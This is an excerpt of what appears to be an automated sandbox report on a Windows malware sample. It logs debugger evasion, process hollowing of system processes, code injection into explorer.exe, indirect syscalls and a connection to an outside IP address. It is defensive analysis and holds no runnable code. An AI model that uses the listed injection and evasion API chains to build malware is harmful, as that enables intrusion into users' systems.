                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_4-880
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_4-889
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_7-104688
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeAPI call chain: ExitProcess graph end nodegraph_10-924
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeAPI call chain: ExitProcess graph end nodegraph_10-922
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeAPI call chain: ExitProcess graph end nodegraph_10-926
                    Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_12-878
                    Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_12-869
                    Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_12-882
                    Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_12-892
                    Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_13-899
                    Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_13-887
                    Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_13-897
                    Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E31B4 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,3_2_00007FF7F73E31B4
                    Found API chain indicative of debugger detection
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_3-1177
                    Source: C:\Windows\System32\audiodg.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_12-1125
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_10-1178
                    Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_4-1122
                    Source: C:\Windows\System32\msiexec.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_13-1142
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                    Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                    Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_06990040 LdrInitializeThunk,9_2_06990040
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E31B4 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,3_2_00007FF7F73E31B4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF44124 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_0DF44124
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF28660 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,7_2_0DF28660
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E14EC LoadLibraryA,GetProcAddress,3_2_00007FF7F73E14EC
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A2F345 mov eax, dword ptr fs:[00000030h]7_2_08A2F345
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE5F345 mov eax, dword ptr fs:[00000030h]7_2_0AE5F345
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B31F345 mov eax, dword ptr fs:[00000030h]7_2_0B31F345
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E2168 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,3_2_00007FF7F73E2168
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DADC62C SetUnhandledExceptionFilter,15_2_00007FF79DADC62C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF79DAE9924
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DADC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF79DADC44C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DADBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00007FF79DADBBC0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DADC62C SetUnhandledExceptionFilter,16_2_00007FF79DADC62C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF79DAE9924
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DADC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF79DADC44C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DADBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF79DADBBC0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CFA184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF821CFA184
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D20F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF821D20F20
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B54A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF838B54A34
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B55054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF838B55054
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B65DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF838B65DF8
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B669F8 SetUnhandledExceptionFilter,16_2_00007FF838B669F8
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B66810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF838B66810
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B8D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF838B8D414
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Benign windows process drops PE files
                    Source: C:\Windows\explorer.exeFile created: 6556.tmp.update.exe.7.drJump to dropped file
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7DF220000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF65D6F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7DF220000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF65D6F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7DF220000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF65D6F0000 protect: page execute and read and writeJump to behavior
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E24D4 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,3_2_00007FF7F73E24D4
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: 8A00000Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeThread created: C:\Windows\explorer.exe EIP: AE30000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeThread created: C:\Windows\explorer.exe EIP: B2F0000Jump to behavior
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeNtUnmapViewOfSection: Indirect: 0x7FF72A022868Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeNtUnmapViewOfSection: Indirect: 0x7FF7F73E2868Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8A00535 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: AE30535 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: B2F0535 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F0000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F0000 value starts with: 4D5AJump to behavior
                    Injects code into the Windows Explorer (explorer.exe)
                    Source: C:\Windows\System32\svchost.exeMemory written: PID: 3968 base: 8A00000 value: 40Jump to behavior
                    Source: C:\Windows\System32\svchost.exeMemory written: PID: 3968 base: 8A00535 value: 4DJump to behavior
                    Source: C:\Windows\System32\audiodg.exeMemory written: PID: 3968 base: AE30000 value: 40Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeMemory written: PID: 3968 base: AE30535 value: 4DJump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: PID: 3968 base: B2F0000 value: 40Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: PID: 3968 base: B2F0535 value: 4DJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeThread register set: target process: 7536Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeThread register set: target process: 7584Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeThread register set: target process: 7556Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeThread register set: target process: 6128Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeThread register set: target process: 6252Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeThread register set: target process: 5828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeThread register set: target process: 1256Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeThread register set: target process: 332Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeThread register set: target process: 1840Jump to behavior
                    Sample uses process hollowing technique
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7DF220000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6DAB80000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF65D6F0000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7DF220000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF65D6F0000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6DAB80000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6DAB80000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7DF220000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF65D6F0000Jump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF221000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF225000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF228000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF229000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF22A000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF22B000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\svchost.exe base: E91133F010Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB81000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB85000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB88000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB89000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8A000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F0000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F1000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F5000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F8000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F9000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6FA000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6FB000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\msiexec.exe base: 5A0196B010Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8B000Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeMemory written: C:\Windows\System32\audiodg.exe base: 13DB17E010Jump to behavior
                    Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8A00000Jump to behavior
                    Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8A00535Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: AE30000Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: AE30535Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: B2F0000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: B2F0535Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF221000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF225000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF228000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF229000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF22A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF22B000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 755238F010Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F0000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F1000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F5000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F8000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F9000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6FA000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6FB000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7CDE3DD010Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB81000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB85000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB88000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB89000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8B000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 3370141010Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB81000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB85000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB88000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB89000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8B000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\audiodg.exe base: 101067B010Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF221000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF225000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF228000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF229000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF22A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF22B000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\svchost.exe base: A581300010Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F0000Jump to behavior
